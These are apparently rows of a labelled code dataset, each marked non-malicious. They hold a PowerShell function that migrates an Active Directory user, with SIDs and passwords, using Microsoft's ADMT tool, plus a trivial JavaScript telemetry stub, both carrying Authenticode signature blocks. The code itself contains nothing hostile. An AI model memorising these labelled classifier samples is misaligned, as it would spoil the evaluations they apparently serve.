# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIGtXwxaSFm/q6+cno4VBehNB
# vmK+diKl8nUYKDwtGhdvMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAU/RnO9liMF0jRywxM9lLN22HHrk334l1nKT9cRhmwFqpjsP76Yvtzvqr
# Y3yYanHsqJNxDr88ddr4IhoyUMD5YAD2s+FNuBJuRl6geGZ9Q6k4muODd1XireuI
# 2S3X6piklPPKZf+XnVpx2okM1TXFAqqgsMRGQLN35qGXkZRwgS/FrvUr6UZCcAfQ
# GYUTeo6Pwlygh7cvRitE+Owq0VSAMR7DfbVAUg6hfP7SYLWVEH7ZAWGthP/oXmt9
# mL4Q6G0Gnnr/Q6iNsFv8UCAd1GURzfBa71luJ+BUtFoANk0r8o4ol+lXysqRII0I
# dP2DjCBaCNVOdfNaBBsWhBZLdapLeKGCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCC
# F3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq
# hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCA41kjdloAEqBWlUqIE+49nXrcyMLXNeg4lsXqL8RwhZwIGZkY0U8WV
# GBMyMDI0MDYxMzAxMDkzNi45MjRaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046MzcwMy0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg
# ghHqMIIHIDCCBQigAwIBAgITMwAAAeqaJHLVWT9hYwABAAAB6jANBgkqhkiG9w0B
# AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD
# VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1
# MzBaFw0yNTAzMDUxODQ1MzBaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z
# MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046MzcwMy0wNUUwLUQ5NDcxJTAjBgNV
# BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQC1C1/xSD8gB9X7Ludoo2rWb2ksqaF65QtJkbQpmsc6
# G4bg5MOv6WP/uJ4XOJvKX/c1t0ej4oWBqdGD6VbjXX4T0KfylTulrzKtgxnxZh7q
# 1uD0Dy/w5G0DJDPb6oxQrz6vMV2Z3y9ZxjfZqBnDfqGon/4VDHnZhdas22svSC5G
# HywsQ2J90MM7L4ecY8TnLI85kXXTVESb09txL2tHMYrB+KHCy08ds36an7IcOGfR
# mhHbFoPa5om9YGpVKS8xeT7EAwW7WbXL/lo5p9KRRIjAlsBBHD1TdGBucrGC3TQX
# STp9s7DjkvvNFuUa0BKsz6UiCLxJGQSZhd2iOJTEfJ1fxYk2nY6SCKsV+VmtV5ai
# PzY/sWoFY542+zzrAPr4elrvr9uB6ci/Kci//EOERZEUTBPXME/ia+t8jrT2y3ug
# 15MSCVuhOsNrmuZFwaRCrRED0yz4V9wlMTGHIJW55iNM3HPVJJ19vOSvrCP9lsEc
# EwWZIQ1FCyPOnkM1fs7880dahAa5UmPqMk5WEKxzDPVp081X5RQ6HGVUz6ZdgQ0j
# cT59EG+CKDPRD6mx8ovzIpS/r/wEHPKt5kOhYrjyQHXc9KHKTWfXpAVj1Syqt5X4
# nr+Mpeubv+N/PjQEPr0iYJDjSzJrqILhBs5pytb6vyR8HUVMp+mAA4rXjOw42vkH
# fQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFCuBRSWiUebpF0BU1MTIcosFblleMB8G
# A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG
# Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy
# MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w
# XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy
# dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG
# A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD
# AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQAog61WXj9+/nxVbX3G37KgvyoNAnuu2w3H
# oWZj3H0YCeQ3b9KSZThVThW4iFcHrKnhFMBbXJX4uQI53kOWSaWCaV3xCznpRt3c
# 4/gSn3dvO/1GP3MJkpJfgo56CgS9zLOiP31kfmpUdPqekZb4ivMR6LoPb5HNlq0W
# bBpzFbtsTjNrTyfqqcqAwc6r99Df2UQTqDa0vzwpA8CxiAg2KlbPyMwBOPcr9hJT
# 8sGpX/ZhLDh11dZcbUAzXHo1RJorSSftVa9hLWnzxGzEGafPUwLmoETihOGLqIQl
# Cpvr94Hiak0Gq0wY6lduUQjk/lxZ4EzAw/cGMek8J3QdiNS8u9ujYh1B7NLr6t3I
# glfScDV3bdVWet1itTUoKVRLIivRDwAT7dRH13Cq32j2JG5BYu/XitRE8cdzaJmD
# VBzYhlPl9QXvC+6qR8I6NIN/9914bTq/S4g6FF4f1dixUxE4qlfUPMixGr0Ft4/S
# 0P4fwmhs+WHRn62PB4j3zCHixKJCsRn9IR3ExBQKQdMi5auiqB6xQBADUf+F7hSK
# ZfbA8sFSFreLSqhvj+qUQF84NcxuaxpbJWVpsO18IL4Qbt45Cz/QMa7EmMGNn7a8
# MM3uTQOlQy0u6c/jq111i1JqMjayTceQZNMBMM5EMc5Dr5m3T4bDj9WTNLgP8SFe
# 3EqTaWVMOTCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI
# hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy
# MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC
# AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg
# M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF
# dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6
# GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp
# Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu
# yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E
# XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0
# lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q
# GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ
# +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA
# PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw
# EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG
# NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV
# MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj
# cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK
# BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC
# AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX
# zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v
# cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI
# KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG
# 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x
# M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC
# VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449
# xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM
# nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS
# PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d
# Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn
# GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs
# QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL
# jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL
# 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNN
# MIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
# bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw
# b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn
# MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjM3MDMtMDVFMC1EOTQ3MSUwIwYDVQQD
# ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCJ
# 2x7cQfjpRskJ8UGIctOCkmEkj6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6hRJUTAiGA8yMDI0MDYxMjE2MjAz
# M1oYDzIwMjQwNjEzMTYyMDMzWjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDqFElR
# AgEAMAcCAQACAh7UMAcCAQACAhMyMAoCBQDqFZrRAgEAMDYGCisGAQQBhFkKBAIx
# KDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZI
# hvcNAQELBQADggEBABitfMRNYCB0DZPjDDqQNh79+qvLwxYEnGbeN6sNy4Vt1VdZ
# DMsCDP7jOeH/5QppGyxx3kIvYceYIoayRK3bdJ0Uj1yCfbyDnJIpqPohHko6i45r
# Tc1Hz6QHFwWBnlyyzzaC3DPQhsnzSSr7lHZcimes/G9/fspVEh68JvdlADm3O4We
# yQBla4sSeE1smXQ0P7R3z5EpOBwCPktFQW8/kMFPf0laaSzuJ3eJopvx0QYii1nb
# 3SNt7ZZVzKe3HH7TclR3QwnRMZuhlqy+tpJQ/foCLbOPqczDyFbKcPnygpPitn76
# gLn1+Z3hIj4r2gCEIJ2fxhMWo2nQpj8HtWgOWa4xggQNMIIECQIBATCBkzB8MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy
# b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAeqaJHLVWT9hYwABAAAB6jAN
# BglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8G
# CSqGSIb3DQEJBDEiBCALDLuQBEFdAnUesHHUdUJ8571Hci0sriBGn4NQlMdByzCB
# +gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICmPodXjZDR4iwg0ltLANXBh5G1u
# KqKIvq8sjKekuGZ4MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh
# c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD
# b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw
# MTACEzMAAAHqmiRy1Vk/YWMAAQAAAeowIgQgqQaBe1dQerUeGFtzteUXdCIlK9o5
# h1qHSB39TnofD7QwDQYJKoZIhvcNAQELBQAEggIAKBsqfGJCtHIJD9YQXpKTyUql
# 3RTkDxl9Mt7ACtsWggMhz+wlgFWxzDHd159Ghx3PUrXz4xJj2itvnmR4IIzc+clO
# RRjPzmT8nZOixXGTskrcZHQfUidIuSk9ACt6LFl/mhsfcgGIpr2Hyv0fcuhi94sK
# lFypN1Lqpt5vz0odTv6PgmOILy+BIzhqXyt33lncN/MRFm3hp0msggr4STYXte6h
# s1+cdjDOCcBhV8E3YIbUtO4+N/TF/ie/pSlv17qM6qNh5fqdMMce7ucnyI/ZKnIs
# vgTnfGf+/Qh9bHeIA7ZLzuNAoCNWDTv/QqBPxCKq/SYTbajXyuAKas26ylFXMwAk
# l9C6+F54lWRhwN37G867o+nM0WDAR9iPCIJizTxVbjw1eR/25FsaPEqWKczw5NT9
# Qg9UPo7SMe5lcjMyMDLHHkAGjXd5x/5il/97syKLNn120/MS2S6tMRYrtwb10qhw
# KPYJrN5QG3bRI62unduF+ZwcFFiHE+Z2YzxyD9hJUPF+QVfH0sGC4mZ/t77Dt+Lz
# /6iw9l5mfn7+VgmR/pcdkoZAYUUa0/gfX5n/ATn7tS+WCJUU741JYxg8494fR4+T
# cAqN2NgDX59XTTIvAKKd9nwgIrGekMlwo9QZHqMl3sRSCtdhdnjkTp+W1skUuA2R
# aeS2AiSjkqUjP3POgGE=
# SIG # End signature block
|
combined_dataset/train/non-malicious/Migrate-ADMTUser.ps1
|
Migrate-ADMTUser.ps1
|
###########################################################################"
#
# NAME: Migrate-ADMTUser.ps1
#
# AUTHOR: Jan Egil Ring
# EMAIL: jan.egil.ring@powershell.no
#
# COMMENT: A function to migrate a single user in the Active Directory Migration Tool, based on the sample script Invoke-ADMTUserMigration.ps1: http://poshcode.org/2046
#
# Instead of hardcoding the variables for the migration, you could add additional parameters to the function to define these.
#
# NOTE: Since ADMT is a 32-bit application, this script must be run from Windows PowerShell (x86).
# It also requires elevated privileges.
#
# For more details, see the following blog-post:
# http://blog.powershell.no/2010/08/04/automate-active-directory-migration-tool-using-windows-powershell
#
# You have a royalty-free right to use, modify, reproduce, and
# distribute this script file in any way you find useful, provided that
# you agree that the creator, owner above has no warranty, obligations,
# or liability for such use.
#
# VERSION HISTORY:
# 1.0 04.08.2010 - Initial release
#
###########################################################################"
function Migrate-ADMTUser {
<#
.SYNOPSIS
Migrate a single user object using ADMT
.DESCRIPTION
Migrates the specified source domain user object to the target domain.
One mandatory parameter: samaccountname
.PARAMETER samaccountname
The samaccountname of the source domain user object to migrate
.EXAMPLE
Migrate-ADMTUser -samaccountname JDoe
.NOTES
AUTHOR: Jan Egil Ring
BLOG: http://blog.powershell.no
LASTEDIT: 04.08.2010
#>
[CmdletBinding()]
param (
[parameter(Mandatory=$true)]
[string]$samaccountname
)
### BEGIN ADMT Scripting Constants ###
# PasswordOption constants
$admtComplexPassword = "&H0001"
$admtCopyPassword = "&H0002"
$admtDoNotUpdatePasswordsForExisting = "&H0010"
# ConflictOptions constants
$admtIgnoreConflicting = "&H0000"
$admtMergeConflicting = "&H0001"
$admtRemoveExistingUserRights = "&H0010"
$admtRemoveExistingMembers = "&H0020"
$admtMoveMergedAccounts = "&H0040"
# DisableOption constants
$admtLeaveSource = "&H0000"
$admtDisableSource = "&H0001"
$admtTargetSameAsSource = "&H0000"
$admtDisableTarget = "&H0010"
$admtEnableTarget = "&H0020"
# SourceExpiration constant
$admtNoExpiration = "-1"
# Translation Option
$admtTranslateReplace = "0"
$admtTranslateAdd = "1"
$admtTranslateRemove = "2"
# Report Type
$admtReportMigratedAccounts = "0"
$admtReportMigratedComputers = "1"
$admtReportExpiredComputers = "2"
$admtReportAccountReferences = "3"
$admtReportNameConflicts = "4"
# Option constants
$admtNone = "0"
$admtData = "1"
$admtFile = "2"
$admtDomain = "3"
$admtRecurse = "&H0100"
$admtFlattenHierarchy = "&H0000"
$admtMaintainHierarchy = "&H0200"
# Event related constants
# Progress type
$admtProgressObjectMigration = "0"
$admtProgressAgentDispatch = "1"
$admtProgressAgentOperation = "2"
$admtProgressMailboxMigration = "3"
# Event type
$admtEventNone = "0"
$admtEventObjectInputPreprocessed = "1"
$admtEventTaskStart = "2"
$admtEventTaskFinish = "3"
$admtEventObjectProcessed = "4"
$admtEventGroupMembershipProcessed = "5"
$admtEventAgentStatusUpdate ="6"
$admtEventAgentNotStarted = "7"
$admtEventAgentFailedToStart = "8"
$admtEventAgentWaitingForReboot = "9"
$admtEventAgentRunning = "10"
$admtEventAgentCancelled = "11"
$admtEventAgentPassed = "12"
$admtEventAgentFailed = "13"
$admtEventAgentWaitingForRetry = "14"
$admtEventAgentSuccessful = "15"
$admtEventAgentCompletedWithWarnings = "16"
$admtEventAgentCompletedWithErrors = "17"
$admtEventTaskLogSaved = "18"
$admtAgentPreCheckPhase = "&H100"
$admtAgentAgentOperationPhase = "&H200"
$admtAgentPostCheckPhase = "&H300"
$admtAgentStatusMask = "&HFF"
$admtAgentPhaseMask = "&H300"
# Status type
$admtStatusSuccess = "0"
$admtStatusWarnings = "1"
$admtStatusErrors = "2"
### END ADMT Scripting Constants ###
#Creates an instance of an ADMT migration object using the COM-object provided with ADMT
$Migration = New-Object -ComObject "ADMT.Migration"
$Migration.IntraForest = $false
$Migration.SourceDomain = "contoso-old.local"
$Migration.SourceDomainController = "dc01.contoso-old.local"
$Migration.SourceOU = "Europe/Norway/Oslo"
$Migration.TargetDomain = "contoso-new.local"
$Migration.TargetDomainController = "dc02.contoso-new.local"
$Migration.TargetOU = "Europe/Norway/Oslo"
$Migration.PasswordOption = $admtComplexPassword
$Migration.PasswordServer = "dc01.contoso-old.local"
$Migration.PasswordFile = "C:\\WINDOWS\\ADMT\\Logs\\Passwords.txt"
$Migration.ConflictOptions = $admtIgnoreConflicting
$Migration.UserPropertiesToExclude = ""
$Migration.InetOrgPersonPropertiesToExclude = ""
$Migration.GroupPropertiesToExclude = ""
$Migration.ComputerPropertiesToExclude = ""
$Migration.SystemPropertiesToExclude = ""
$Migration.PerformPreCheckOnly = $false
$Migration.AdmtEventLevel = $admtStatusWarnings
$Migration.CommandLine = $false
#Creates an user migration object
$UserMigration = $Migration.CreateUserMigration()
$UserMigration.DisableOption = $admtTargetSameAsSource
$UserMigration.SourceExpiration = $admtNoExpiration
$UserMigration.MigrateSIDs = $true
$UserMigration.TranslateRoamingProfile = $false
$UserMigration.UpdateUserRights = $false
$UserMigration.MigrateGroups = $false
$UserMigration.UpdatePreviouslyMigratedObjects = $false
$UserMigration.FixGroupMembership = $true
$UserMigration.MigrateServiceAccounts = $false
#Initiates user migration. Logs are written to C:\\Windows\\ADMT\\Logs by default.
$UserMigration.Migrate($admtData,$samaccountname,$null)
#Creates a password migration object
$PasswordMigration = $Migration.CreatePasswordMigration()
#Initiates password migration. Logs are written to C:\\Windows\\ADMT\\Logs by default.
$PasswordMigration.Migrate($admtData,$samaccountname,$null)
}
|
combined_dataset/train/non-malicious/sample_49_54.ps1
|
sample_49_54.ps1
|
/*!---------------------------------------------------------
* Copyright (C) Microsoft Corporation. All rights reserved.
*----------------------------------------------------------*/
/// <reference path="telemetry.d.ts" />
var IgnoreTelemetryReporter = (function () {
function IgnoreTelemetryReporter(isInternalUser, userId) {
this.sendEvent = function (name, properties) { };
}
return IgnoreTelemetryReporter;
})();
module.exports = IgnoreTelemetryReporter;
// SIG // Begin signature block
// SIG // MIIavQYJKoZIhvcNAQcCoIIarjCCGqoCAQExCzAJBgUr
// SIG // DgMCGgUAMGcGCisGAQQBgjcCAQSgWTBXMDIGCisGAQQB
// SIG // gjcCAR4wJAIBAQQQEODJBs441BGiowAQS9NQkAIBAAIB
// SIG // AAIBAAIBAAIBADAhMAkGBSsOAwIaBQAEFO/DDQ5q+itO
// SIG // 2AeyqqqEn4zw9eIsoIIVgjCCBMMwggOroAMCAQICEzMA
// SIG // AACP13YVuc1FinQAAAAAAI8wDQYJKoZIhvcNAQEFBQAw
// SIG // dzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0
// SIG // b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1p
// SIG // Y3Jvc29mdCBDb3Jwb3JhdGlvbjEhMB8GA1UEAxMYTWlj
// SIG // cm9zb2Z0IFRpbWUtU3RhbXAgUENBMB4XDTE1MTAwNzE4
// SIG // MTQwNVoXDTE3MDEwNzE4MTQwNVowgbMxCzAJBgNVBAYT
// SIG // AlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
// SIG // EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y
// SIG // cG9yYXRpb24xDTALBgNVBAsTBE1PUFIxJzAlBgNVBAsT
// SIG // Hm5DaXBoZXIgRFNFIEVTTjpGNTI4LTM3NzctOEE3NjEl
// SIG // MCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy
// SIG // dmljZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
// SIG // ggEBAKSXCL1GVhhx/mnpXuaSknagHAzBH/jAyusxgKPz
// SIG // FF/HbeQC0cvShTFODRwBkvP5fKG6gHayNPaIIvm+OXKJ
// SIG // D4X+BUox/RcZyOHygOQ9c786kkmb9g6Pwz8EwAZ9ICQy
// SIG // BIPfHlq3030okgXiIrQiCOMWK3EM5izXToSu3PbOGtve
// SIG // 79mKErK+ssMLIthgk0e5X+t/Q0Kb1HsFHgII0uXYn08y
// SIG // TmOj9c2mYWi3tyQX0Gg/1zcCkVB2dYCqWR0egSn0gNUK
// SIG // 9svEiB+kp46DT+YP4tUiS3vARbsEbpHRJAEpDzJYs01V
// SIG // pNIigwq6tiuCam+EyHQun7cZ5Sy00OqNdBoKLN8CAwEA
// SIG // AaOCAQkwggEFMB0GA1UdDgQWBBRAgoBoYnKeYCAGmN8c
// SIG // enak4MI7hzAfBgNVHSMEGDAWgBQjNPjZUkZwCu1A+3b7
// SIG // syuwwzWzDzBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
// SIG // Y3JsLm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0
// SIG // cy9NaWNyb3NvZnRUaW1lU3RhbXBQQ0EuY3JsMFgGCCsG
// SIG // AQUFBwEBBEwwSjBIBggrBgEFBQcwAoY8aHR0cDovL3d3
// SIG // dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNyb3Nv
// SIG // ZnRUaW1lU3RhbXBQQ0EuY3J0MBMGA1UdJQQMMAoGCCsG
// SIG // AQUFBwMIMA0GCSqGSIb3DQEBBQUAA4IBAQBLLLMnOQ9u
// SIG // ElE0nhqb0/qeH6aHALv5as8qj/FBmUERjn49BKm6lUN5
// SIG // SRTehiTCQsPnqh4Tj6NBhRMiHGh/VEGImNuVFcoloGaP
// SIG // 9j6/7xQFdO7l4d5F8C3r96brxB2vidsCr7qv4MRomHB1
// SIG // dv5C9BC3S3+53jYRYmRgqB7hNJn+ZVEhgJYT+QIXfpzv
// SIG // WFWGhex8GW48YjGxoLEVUjJsYhK7+kPsiZj9VnONRUOw
// SIG // lksxbV2vhrWJljS01VXFdT9e7jm+4bVzWnKp9/bhNfrL
// SIG // CWvZpcE90nx2EjuVDXuDMBfW3cnEiFXPKcTR3T25ysNx
// SIG // yiP4Vq46cmmuqV//QmxpnZTbMIIE7DCCA9SgAwIBAgIT
// SIG // MwAAAQosea7XeXumrAABAAABCjANBgkqhkiG9w0BAQUF
// SIG // ADB5MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu
// SIG // Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMV
// SIG // TWljcm9zb2Z0IENvcnBvcmF0aW9uMSMwIQYDVQQDExpN
